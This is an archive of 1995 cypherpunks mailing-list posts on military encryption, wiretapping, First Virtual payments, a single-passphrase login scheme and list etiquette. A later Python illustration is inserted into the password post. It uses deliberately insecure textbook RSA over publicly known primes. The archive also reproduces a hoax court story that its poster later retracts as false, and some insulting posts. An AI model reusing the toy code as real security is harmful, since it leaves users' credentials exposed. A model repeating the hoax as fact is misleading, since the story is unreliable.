Content-Type: text/plain


Perry:
> This is cypherpunks, a mailing list for people interested in
> cryptography and its social implications. This is not "Conspiracy
> Buffs Digest: All The Silly Conspiracy Theories You Can Read".
> 
> Please take the noise postings elsewhere.

I am very much in agreement. I am not interested in reading this stuff
in the cpunks mail list. Here is what I consider to be acceptable ways
to send this stuff to the people on cpunks:

1) NOT AT ALL

2) A pointer and explanation. For example:
   "Hey, there is an article that describes the Foster case, which 
    also includes proof that the NSA [something relevant to cpunks] and
    it's on alt.kooks.conspiracy posted by John Spook, msg id <msg123.host>"
 
3) A summary of the parts relevant to cpunks. For example:
   "A recent 50-page NYT book on whitewater mentions that Hubbard used 
    Nautilus to talk over the phone with Ms. Clinton"

In the past, method 3 (summarizing) has proven very effective for some
newspaper articles on things.

Don

Note: this is not meant to release me from guilt of having posted
off-topic and inane things in the past (and future), but at least I did
so with little bandwidth. 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Sat, 29 Jul 95 02:26:22 PDT
To: cypherpunks@toad.com
Subject: Re: First Virtual, Nathaniel Boorenstein
In-Reply-To: <199507290905.EAA01962@ valhalla.phoenix.net>
Message-ID: <199507290925.DAA11537@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous:
> Mr. Borenstein's text production rate is truly amazing.  We should
> induct him into the Internet Hall-of-Fame immediately.
> 
> He rivals Kibo in his ability to detect messages about himself or his
> company.  He rivals Sternlight in his ability to generate endless
> streams of minor points.

This whole thread has me wondering what "ELL DEE" is up to these days.

Ooops, I think I just added another msg to the thread.
Good thing it's not signed, I'll deny I sent it.



In order to give this message an ObCrypto, might I mention that we actually
had some traffic on the #crypto/#cpunks channels recently. No alt.conspiracy
or rant-o-matics either!!

Don



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Sat, 29 Jul 95 02:05:26 PDT
To: cypherpunks@toad.com
Subject: First Virtual, Nathaniel Boorenstein
Message-ID: <199507290905.EAA01962@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Borenstein's text production rate is truly amazing.  We should
induct him into the Internet Hall-of-Fame immediately.

He rivals Kibo in his ability to detect messages about himself or his
company.  He rivals Sternlight in his ability to generate endless
streams of minor points.

Crypto-relevance: 

1) What technique could be used to differentiate Borenstein's rants
from automatic rant generator output?  Has First Virtual done this?
If someone wanted to generate a Borenstein rant-generator, god knows
that there's enough low-entropy sample material out there.

2) If you're looking for keywords to insert into your M-x
spook-the-spooks generator, try Borenstein and First Virtual.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Sat, 29 Jul 95 03:00:55 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Sat phone permit "wire"taps
In-Reply-To: <Pine.D-G.3.91.950728133852.23404F-100000@dg.thepoint.net>
Message-ID: <Pine.BSI.3.91.950729045012.23165A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been arrested too many times, and done enough local, state, and
federal time to know. If THEY want it, THEY will GET IT.
Constitution or no. Just like most of us here.

And....if ya can't get it right away, ya keep hacking at it
until YA DO GET IT. It's really that simple. They do it, we do it.

The satellites are no different than anything else.

Next case........

Love Always,

Carol Anne



On Fri, 28 Jul 1995, Brian Davis wrote:
> On Thu, 27 Jul 1995, Phil Fraering wrote:
> >    From: Ted_Anderson@transarc.com
> >    I found these paragraphs in a recent Space News interesting.  They were
> >    at the end of an article titled "Military Officials Open To Using
> >    Civilian Links" in the July 3rd issue. 
> >      "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
> >    features to permit authorized eavesdropping, officials said. 
> Did you miss this word?  While I suspect that you don't like Title III 
> wiretaps, they are legal at present.  The above contemplates legal 
> wiretaps on some phone service that might otherwise be outside the reach 
> of legal wiretaps.
> > It's a pity that the military has decided that in its zeal to listen
> > in on phone calls, that national security is an expendable asset.
> The military is not authorized to listen in to any phone calls they want 
> to hear.  Otherwise, everyone on the list, including me, would probably 
> be in some hidden military prison.
> 
> :-)  for the humor-impaired.

Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 29 Jul 95 04:37:31 PDT
To: cypherpunks@toad.com
Subject: NO reasno whatsoever for the MILITARY to use an intentionally WEAK encryption system. (fwd)
Message-ID: <9507291131.AA18987@all.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From fc Sat Jul 29 07:18:30 1995
Subject: NO reasno whatsoever for the MILITARY to use an intentionally WEAK encryption system.
To: pgf@tyrell.net (Phil Fraering)
Date: Sat, 29 Jul 1995 07:18:30 -0400 (EDT)
In-Reply-To: <199507282019.AA27619@tyrell.net> from "Phil Fraering" at Jul 28, 95 03:19:45 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 3694      

...
> You misunderstand. With public key encryption, the proliferation of processor
> power and bandwidth, and their funding, there is NO reason whatsoever for the
> MILITARY to use an intentionally WEAK encryption system.

	The military doesn't have that much funding for this sort of
thing.  There are more than 2.5 million computers (est.) in the DoD, and
to put in and manage a cryptosystem for this large a network is a very
difficult and expensive proposition. 

	At $100 per computer (including only purchase price and
installation) that's $250 million, but that only covers relatively low
bandwidth communications.  The vast majority of systems use Ethernets
and similar things where encryption is far more expensive - but we'll
ignore that for now.

	You also have the key management problem.  You need to create a
secure distributed key management database capable of handling 2.5
million public keys.  No current system I am aware of can do this, so
there is a substantial R+D problem out there.  Then we have to put hooks
into every different OS used in the DoD to allow this to work properly. 
Then we have issues like synchronization and man-in-the-middle attacks
to worry about.  Any of these could take out the crypto-systems, which
are (in today's world) less reliable than standard communications.

	This means we are sacrificing availability for confidentiality,
which in the military domain means we will lose the war, but nobody will
be able to tell us why, because they will never be able to decrypt all
the details.

	The DoD does use cryptography extensively, but only to protect
information worthy of the real costs and complexities associated with the
technology - just as any organization should strive to do.

...
> I think you misunderstood: if we want a military in the first place
> (yes, I realize that's an open question to many people on this list)
> it needs to have as much of its communications encrypted as possible.
> Without back doors or intentionally weakened algorithms. Otherwise
> we're just stuck with a standard conventional force that isn't _that_
> great compared to the combined assets of a reasonable assembly of
> enemy forces.

	Secrecy isn't the only military advantage in information
warfare.  The pace of the action is far more important, the availability
of select information at the right place at the right time is far more
important, the ability to deny information to the enemy is far more
important, the accuracy and timeliness of the information is far more
important, and on and on.  If you really want to know more about this, you
should read:

	"Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95


	Furthermore, backdoors are very useful, for example, when we
sell the equipment to other nations who resell them to those who try to
use the technology against us.  The best cryptosystem for the NSA is one
that only they can break.

> I would go even farther: since so many of the troops sent over to the Gulf
> in the war there went with K-Mart-purchased GPS receivers that the military
> had to turn off selective availability, I am willing to bet that in future
> conflicts the U.S. soldier's ability to have secure communications (with
> no backdoors or weakened algorithms) is dependent on civilians having access
> to the same technology. Because the only way they might have it is if Ma
> and Pa go down to the local K-Mart and buy one for their son/daughter about
> to go overseas.

How much would you like to make that bet for?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sat, 29 Jul 95 09:16:20 PDT
To: CYPHERPUNKS@toad.com
Subject: Universal Password System?
Message-ID: <8AE21FE.0003000281.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain



  I was thinking some more (look out, this could be dangerous) about the
concept of using some kind of H(challenge+password) system to keep
passwords away from ____(your threat model here)____, when it hit me
that we could devise a standard password system, which would allow Joe
Schmoe to have a single password for all of his interactions with
puters.

  Ideally, Joe would need a "smart card" or PDA with IR link (this could
even be the proverbial Windows Watch) that would not need to keep the
actual passphrase at all (but would insure against a compromised system
recording keystrokes) that would keep the pubkeys of all systems with
which he has accounts. It would also need to be able to display in
decimal and hex for systems without the IR link.

  When he is making connections to a new system, the system will give
him its S and RSA or other public key K, so that the smart card can
compute K( H(S+P) ), and send that as the password. To the system, Q =
K"( K( H(S+P) ) ) =is= the password, but Joe only needs to remember P
for everything.

  From then on, logons will include the system sending S and a
non-reproducible challenge <C,D,....> (where C is iterated
less-frequently and D is time.of.day) and the smart card responding with
K( H( D + H(C+Q) ) ). As you may recall, the idea of the multi-part
challenge was so as to allow the admin of the system to store Q
remotely, and keep C -of-the-day and H(C+Q) for each user on the system
itself. With appropriate safeguards (a physical switch on the case of
the system which kills the NVRAM chip with the key for the secure file
system), this would seem to be Pretty Secure.

  The system is extensible, allowing further nesting of challenge parts
within the hash/concatenation function, so that layers of security can
be used, if anyone can find an application for them. The basic principle
of the master passphrase for all uses would make it easier to get Joe to
use one that he can remember, without giving up anything to corrupt
administrators (I have a hell of a time remembering all the passwords
for every system, and must let the comm program remember them,
protecting it with another password.  Messy.)

  Comments?



 * Tribble: *   Punk Tribble: Y    Tribble Contortionist: &
---
 * Monster@FAmend.Com *    
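
The enrollment and login exchange described in the message above, written out as an added example that is not part of the original post. Assumptions: SHA-256 stands in for H with length-prefixed concatenation for "+", K is textbook RSA over two publicly known Mersenne primes (a toy with no security, used only so the code runs with the standard library), D is passed in as a time-of-day byte string, and the names `Card`, `System` and `demo` are hypothetical.

```python
import hashlib
import hmac
import secrets

# Toy K / K" (assumption, not from the post): textbook RSA over two publicly
# known Mersenne primes. No security; it only lets the example run offline.
_P, _Q = 2**521 - 1, 2**607 - 1
N, E = _P * _Q, 65537
_D = pow(E, -1, (_P - 1) * (_Q - 1))


def H(*parts: bytes) -> bytes:
    """The post's H(a+b): SHA-256 over length-prefixed parts (assumed encoding)."""
    h = hashlib.sha256()
    for part in parts:
        h.update(len(part).to_bytes(4, "big") + part)
    return h.digest()


def K(digest: bytes) -> int:
    """Card side: encrypt a 32-byte hash under the system's public key."""
    return pow(int.from_bytes(digest, "big"), E, N)


def K_inv(blob: int) -> bytes:
    """System side, the private-key operation; empty bytes if not a 256-bit hash."""
    m = pow(blob, _D, N)
    return m.to_bytes(32, "big") if m < 2**256 else b""


class Card:
    """Joe's card: holds S and the public key; P is typed in and never stored."""

    def __init__(self, salt: bytes):
        self.salt = salt

    def enroll(self, p: bytes) -> int:
        return K(H(self.salt, p))                      # K( H(S+P) )

    def respond(self, p: bytes, c: bytes, d: bytes) -> int:
        q = H(self.salt, p)                            # Q = H(S+P)
        return K(H(d, H(c, q)))                        # K( H( D + H(C+Q) ) )


class System:
    def __init__(self):
        self.salt = secrets.token_bytes(16)            # S
        self.vault = {}    # user -> Q; the post keeps this off the login host
        self.daily = {}    # user -> H(C+Q); the only per-user secret on the host
        self.pending = {}  # user -> D of the outstanding challenge
        self.c = b""

    def enroll(self, user: str, blob: int) -> None:
        q = K_inv(blob)
        if not q:
            raise ValueError("enrollment blob does not decrypt to a hash")
        self.vault[user] = q

    def rotate(self, c: bytes) -> None:
        """Install a new C and recompute H(C+Q) for every user from the vault."""
        self.c = c
        self.daily = {u: H(c, q) for u, q in self.vault.items()}
        self.pending.clear()

    def challenge(self, user: str, d: bytes):
        self.pending[user] = d
        return self.c, d

    def verify(self, user: str, response: int) -> bool:
        d = self.pending.pop(user, None)               # each D is answered once
        if d is None or user not in self.daily:
            return False
        return hmac.compare_digest(K_inv(response), H(d, self.daily[user]))


def demo() -> dict:
    host, out = System(), {}
    card, pw = Card(host.salt), b"one passphrase for everything"  # constructed
    host.enroll("joe", card.enroll(pw))
    host.rotate(b"1995-07-29")
    c, d = host.challenge("joe", b"09:16:20")
    good = card.respond(pw, c, d)
    out["login"] = host.verify("joe", good)
    host.challenge("joe", b"09:16:21")                 # old reply against a new D
    out["replay"] = host.verify("joe", good)
    c, d = host.challenge("joe", b"09:16:22")
    out["wrong_passphrase"] = host.verify("joe", card.respond(b"guess", c, d))
    # Exposure check: H(C+Q) as stored on the host answers any D until C
    # changes, which is why the post rotates C and keeps Q somewhere else.
    leaked = host.daily["joe"]
    c, d = host.challenge("joe", b"09:16:23")
    out["leaked_same_c"] = host.verify("joe", K(H(d, leaked)))
    host.rotate(b"1995-07-30")
    c, d = host.challenge("joe", b"00:00:01")
    out["leaked_after_rotation"] = host.verify("joe", K(H(d, leaked)))
    c, d = host.challenge("joe", b"00:00:02")
    out["login_after_rotation"] = host.verify("joe", card.respond(pw, c, d))
    return out
```

Calling `demo()` returns one boolean per scenario. Because the toy K is deterministic, it adds nothing over sending the hash itself; a real deployment would need randomized padding for the encryption step to matter.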




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 29 Jul 95 07:19:04 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: NO reasno whatsoever for the MILITARY to use an intentionally WEAK encryption system. (fwd)
In-Reply-To: <9507291131.AA18987@all.net>
Message-ID: <Pine.3.89.9507291033.A29947-0100000@larry>
MIME-Version: 1.0
Content-Type: text/plain



> 	The DoD does use cryptography extensively, but only to protect
> information worthy of the real costs and complexities

      Another interlocutor whose knowledge of military traffic comes from 
      watching Hollywood movies/TV shows.  Or, maybe he even has access to
      high-level briefings - and believes everything that is said.

      Doc, you might find it instructive to spend a tour in the real world
      of the military. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 29 Jul 95 07:33:17 PDT
To: cypherpunks@toad.com
Subject: Re: The Net (short movie review)
Message-ID: <v02120d02ac3ff64cfb3e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:04 AM 7/29/95, Joel McNamara wrote:
>Don't bother.  Better to wait until it hits the video shelves then have a
>party and see who can find the most (of many) technical flaws and gaffes.
>Would be much more entertaining in that context.

Agreed. In television interviews Ms. Bullock talks about how she's "on the
net all the time" while in further conversation it's clear that all she
does is hang out in AOL auditoria and chat-rooms, probably with some
net.flack at her elbow....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sat, 29 Jul 95 08:07:20 PDT
To: cypherpunks@toad.com
Subject: Re: First Virtual, Nathaniel Boorenstein
In-Reply-To: <199507290905.EAA01962@ valhalla.phoenix.net>
Message-ID: <199507291507.LAA01789@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous Asshole writes:
> Mr. Borenstein's text production rate is truly amazing.  We should
> induct him into the Internet Hall-of-Fame immediately.

god, you're a clueless jerk, whoever you are. What's Nat done to you?


.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Sat, 29 Jul 95 09:18:08 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: <plonk> now! Grabbe, X, re. Foster, NSA, BCCI, etc.
In-Reply-To: <Pine.SOL.3.91.950728171939.22819C-100000@use.usit.net>
Message-ID: <Pine.SOL.3.91.950729104856.13994B-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Let's see:  Chapter X of this serial features Clark Clifford,
Nixon, Noriega, Robert Wagner (but not Natalie Wood), Bill
Clinton as CIA agent in London, billionaire sheiks, the 
Medellin and Cali cartels, Cap Weinberger, Bob Dole, the
Mossad, BCCI, Jack Stephens, Barry Seals, drug deals, money
laundering, clandestine air strips, the Contras, Oliver North,
nuclear weapons, the Committee Of 30, Bert Lance, the Rose
Law Firm, a suspiciously dead investigative reporter, and
aliens from UFOs....

No, wait--no aliens yet!

Do we get the aliens in Chapter XI, at last?  I keep waiting
for the aliens, send in the aliens, there ought to be aliens...

MacN


> ---------- Forwarded message ----------
> Date: Fri, 28 Jul 1995 15:49:28 -0400 (EDT)
> From: KALLISTE@delphi.com
> To: bdolan@use.usit.net
> Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 	 Allegations Regarding Vince Foster, the NSA, and 
> 	       Banking Transactions Spying, Part X
> 
> 		     by J. Orlin Grabbe
> 
> ***********************************************************************
>      
>        What do nuclear weapons, money laundering, covert operations, 
> money management, clandestine payments of payola and kickbacks, and the 
> systematic monitoring of bank loans and bank wire transfers have in common? 
> 
>        The answer begins with BCCI: the Bank of Credit and Commerce 
> International. BCCI connects the Israeli bomb to the Pakistani bomb to 
> suppliers of banking software like Systematics, and to a very dead money 
> launderer named Vince Foster.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 29 Jul 95 08:41:42 PDT
To: alanh@infi.net (Alan Horowitz)
Subject: what the military does and why (re: cryptography)
In-Reply-To: <Pine.3.89.9507291033.A29947-0100000@larry>
Message-ID: <9507291535.AA04463@all.net>
MIME-Version: 1.0
Content-Type: text


> > 	The DoD does use cryptography extensively, but only to protect
> > information worthy of the real costs and complexities
> 
>       Another interlocutor whose knowledge of military traffic comes from 
>       watching Hollywood movies/TV shows.  Or, maybe he even has access to
>       high-level briefings - and believes everything that is said.
> 
>       Doc, you might find it instructive to spend a tour in the real world
>       of the military. 

Perhaps if you reviewed the material on which my comments are based, you
would have a different opinion, and perhaps not, but to make your
comment based on an apparent lack of knowledge of the basis for my
opinions indicates both a lack of willingness to spend the necessary
effort checking before you make such statements and a lack of desire to
engage in more than rank speculation.

To get an idea of the basis for my comments, you might start by reading
some of my writings and look through the citations I use as a basis for
my opinions.  If you would like a reading list, look under Management
Analytics in my W3 site:

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Sat, 29 Jul 95 11:15:27 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: The little sex kitten
Message-ID: <199507291757.RAA10336@maalox>
MIME-Version: 1.0
Content-Type: text


I don't know if this item has been posted here yet, but someone just
emailed it to me, and I thought you folks might enjoy it.

 -prz

 ----
Date: Thu, 27 Jul 1995 13:53:02 -0400
Subject: The little sex kitten

JUDGE RULES ON E-MAIL PRIVACY CASE

TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many
legal experts believe clearly delineates the e-mail privacy rights of
computer users in the workplace.  Judge Stan Musing declared that employees
have a right to expect that their employers will refrain from monitoring
e-mail messages transmitted on company systems.  The case went to court
after programmer Augustus Lindsey's supervisor monitored his e-mail and
intercepted a message from Lindsey to a colleague.  The message read:
"That little sex kitten has been driving me wild.  She's moaning and begging
for it every minute.  Last night I was afraid someone would hear, and we'd
be thrown out of the building.  But don't worry -- all is arranged.
Wednesday she gets the knife".  Lindsey's supervisor alerted authorities,
suspecting that a crime was in the making.  Lindsey was arrested on the spot
and spent an uncomfortable night discussing the situation with the police. 
However, he was released in the morning, just in time to get his female 
cat to the vet for spaying.  Lindsey sued his boss for invasion of privacy 
and sought punitive damages as well.

----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sat, 29 Jul 95 04:10:59 PDT
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: Zimmerman legal fund
Message-ID: <19336.9507291110@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Nathaniel Borenstein <nsb@nsb.fv.com> writes on cpunks:
> The relationship is a completely open and friendly one, 

Not intending to infer otherwise (indeed I think I said this).

> without any strings attached that I'm aware of.
> [...]
> So, FV has been a friend of Phil's for a long time.  We launched the
> Yellow Ribbon campaign and the FV-based fundraising drive in that
> spirit, though clearly it doesn't exactly hurt us if people sign up
> for FV in order to donate to Phil.  That really wasn't our
> motivation, however, and we sought to underscore that fact by making
> a donation to Phil's defense fund every time people sign up for a
> new account expressly in order to donate to ZLDF.  In other words,
> if you are a Zimmerman supporter and you were thinking it might be
> nice to have an FV account anyway, you can help Phil even more by
> signing up and paying your $2 fee through the ZLDF pages.

Okay so far so good.  Sounds good for Phil Z which sounds cool to me.

> Well, only on the cypherpunks list would you be likely to find
> general agreement that PGP'ed credit card numbers are "easier" than
> First Virtual.  Many thousands of extremely naive net citizens are
> now happy FV customers, and I seriously doubt that most of them
> could master PGP without a full-day tutorial.  (We're not talking
> about rocket scientists here, folks.)

I dunno you know... sci.crypt, alt.security.pgp, alt.privacy,anon-server, 
etc, etc. are I think the most common people to be using the
yellow-ribbon sig, and hence the places they post to (mainly the same)
are likely to be the people who see it, and are hence likely to
contribute.

The URL being used is http://www.netresponse.com/zldf, and nowhere
does it mention using PGP and CC #'s.  Most people who can't use PGP
aren't going to be interested I would have thought.  When I read the
URL I thought, hmm, okay, got fired up and thought I'd donate
something right then... but when it came to it, I had to sign up for a
fv account.  I cooled.  It has to be instant, for best effect.

> There are two web sites basically because they are taking care of
> the informational aspects and we're concentrating (pro bono) on the
> online fundraising aspects.  

If www.netresponse.com is someone else (although you did say you
started the Yellow Ribbon campaign), I guess the comments are directed
to them rather than you, as if your link is just "the FV method to
donate to the PZLDF", then fair enough.  Maybe I should try target at
the zldf@clark.net email.  (I think there is a human one if I remember
rightly.  Also note that this was _not_ an attack on FV, but rather a
plea to improve the amount of money the yellow ribbon campaign draws
for the PZLDF, by providing alternatives which will suit some people
better for a one-off, instant payment).

> If we've overly stressed FV as a collection mechanism, I apologize,
> but you must bear in mind that we've been living and breathing the
> FV payment system for 18 months now, and it would be kind of hard
> for us not to even *mention* it.  :-)

Okay, now separate issue, really talking about FV now.  For me, the
main thing holding me back from using it is that I'm not in the US,
and don't have a US bank account to open a FV seller acct.  (I would
have liked to use it as one of the few net payment systems actually up
and running, as a payment method for the RSA T-shirts, it would have
been a nice system, allowing me to effectively accept VISA payments
which I have otherwise been unable to do.)

Any news on this front?  Last I looked on your WWW page, you were
investigating this and payments in other currencies.  US$ would be
fine though, as long as it was possible for the seller to create a US
account, or have it paid to a non-US account (would it not be possible
to pay to non-US account?).

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Sat, 29 Jul 95 10:15:39 PDT
To: cypherpunks@toad.com
Subject: Re: copyrighting algorithms
Message-ID: <01HTFZ8S12128WWGGL@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date sent:        Thu, 27 Jul 1995 21:43:07 -0700
From:             Bill Trost <trost@cloud.rain.com>
Subject:          copyrighting algorithms
To:               Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Copies to:        rross@sci.dixie.edu (Russell Ross), 
ssl-talk@netscape.com,
 cypherpunks@toad.com

Wolfgang Roeckelein writes:
    >I wasn't aware that you could copyright an algorithm.  Patent,
    >yes, but not copyright.  Intellectual property meens secret,
    >right?  Aren't there any precendence cases involving propriety
    >schemes that are reverse engineered?

=snipped=

bt> As for the quoted material, "Intellectual property meens [sic]
bt> secret" is quite mistaken.  Copyright and patents are the two most
bt> common forms of intellectual property (AFAIK), and neither of them are
bt> secret (unless they're classified patents, but never mind...).

from _computer_digest_ (raleigh,nc edition) august 1995...

"In the past, the office (U.S. Patent Office) has contended that
because software is a mathematical process, it can only be
- -protected- and not -patented- by copyright law. However, the U.S.
Court of Appeals for the D.C. Circuit has ruled in several recent
cases that inventors deserve patents because the programming was
integral to the machine."
...

The office announced in March that it would propose new rules for
embedded software patents and published them in the June 2 Federal
Register..."

Spokesman Richard Maulsby said the agency hopes to have final
guidelines in place by September.

Under law, the office issues patents for 'machines', 'articles of
manufacture' and 'processes'. The proposed rules tell patent
examiners how to determine whether software proposed for patenting
meets the criteria.

Under the proposed rules: 'A computer or other programmable
apparatus whose actions are directed by a computer program or other
form of software is a statutory "machine". A computer-readable memory
that can be used to direct a computer to function in a particular
manner when used by the computer is a statutory "article of
manufacture". A series of specific operational steps to be performed
on or with the aid of a computer is a statutory "process."

What isn't patentable? According to the rules: 'A compilation or
arrangement of data independent of any physical element,' meaning no
hardware. 
...

The guidelines are available on the patent office's World Wide Web
server at http://www.uspto.gov.

The patent office is accepting comments on the proposed guidelines
through July 31.
...

Comments can ... be sent by Internet electronic mail to:
comments-softwarepro.gov.

=============================

obcrypto:
would this give any more ammunition to companies like rsa in
protecting their algorithm?


amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 4A2683C1
July 29, 1995   12:35

-----BEGIN PGP SIGNATURE-----
Version: 2.61

-----END PGP SIGNATURE-----
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 29 Jul 95 10:24:47 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: what the military does and why (re: cryptography)
In-Reply-To: <9507291535.AA04463@all.net>
Message-ID: <Pine.3.89.9507291333.A17374-0100000@larry>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 29 Jul 1995, Dr. Frederick B. Cohen wrote:

> some of my writings and look through the citations I use as a basis for
> my opinions.  If you would like a reading list, look under Management
> Analytics in my W3 site:

Doc, how much actual workaday classified traffic have you laid eyes upon?
Never seen an E-2's orders to alcohol-rehabilitation school classified Top 
Secret? Never seen extracts from Janes _Ships of the World_ classified as 
Secret?

Management Analytics. That's what the world needs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 29 Jul 95 10:43:24 PDT
To: alanh@infi.net (Alan Horowitz)
Subject: Re: what the military does and why (re: cryptography)
In-Reply-To: <Pine.3.89.9507291333.A17374-0100000@larry>
Message-ID: <9507291737.AA12037@all.net>
MIME-Version: 1.0
Content-Type: text


> Doc, how much actual workaday classified traffic have you laid eyes upon?

I could tell you, but then I'd have to shoot you.

> Never seen an E-2's orders to alcohol-rehabilitation school classified Top 
> Secret?
> Never seen extracts from Janes _Ships of the World_ classified as 
> Secret?

Just because you don't know why they are classified that way doesn't
make the classifications invalid, and furthermore, I don't recall saying
that the DoD is perfect.  What I said was that they can't cost
effectively encrypt all information and that they also have requirements
that may make cryptography inappropriate in certain circumstances, so
they have policies and perform risk analysis on what to spend money
protecting with cryptography. 

> 
> Management Analytics. That's what the world needs.
> 

Even a monkey eventually types truly wise statements given enough time.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Sat, 29 Jul 95 13:15:31 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: The little sex kitten -- untrue story
Message-ID: <199507292010.UAA10501@maalox>
MIME-Version: 1.0
Content-Type: text


I posted this funny story to cypherpunks earlier today after someone
emailed it to me.  Now I am told the story is false.  There are no
court records of such a case.  And it apparently was posted to the net
(maybe to cypherpunks) months ago, and it was shown to be false.  I should
have checked it out before posting it to a public newsgroup.  Sorry about
that.  How embarrassing.  Well, it still has entertainment value, as long
as it's clearly labeled as fiction.

 -Philip Zimmermann

Date: Thu, 27 Jul 1995 13:53:02 -0400
Subject: The little sex kitten

JUDGE RULES ON E-MAIL PRIVACY CASE

TULSA, OKLA -- The Oklahoma Supreme Court has ruled on a case that many
legal experts believe clearly delineates the e-mail privacy rights of
computer users in the workplace.  Judge Stan Musing declared that employees
have a right to expect that their employers will refrain from monitoring
e-mail messages transmitted on company systems.  The case went to court
after programmer Augustus Lindsey's supervisor monitored his e-mail and
intercepted a message from Lindsey to a colleague.  The message read:
"That little sex kitten has been driving me wild.  She's moaning and begging
for it every minute.  Last night I was afraid someone would hear, and we'd
be thrown out of the building.  But don't worry -- all is arranged.
Wednesday she gets the knife".  Lindsey's supervisor alerted authorities,
suspecting that a crime was in the making.  Lindsey was arrested on the spot
and spent an uncomfortable night discussing the situation with the police. 
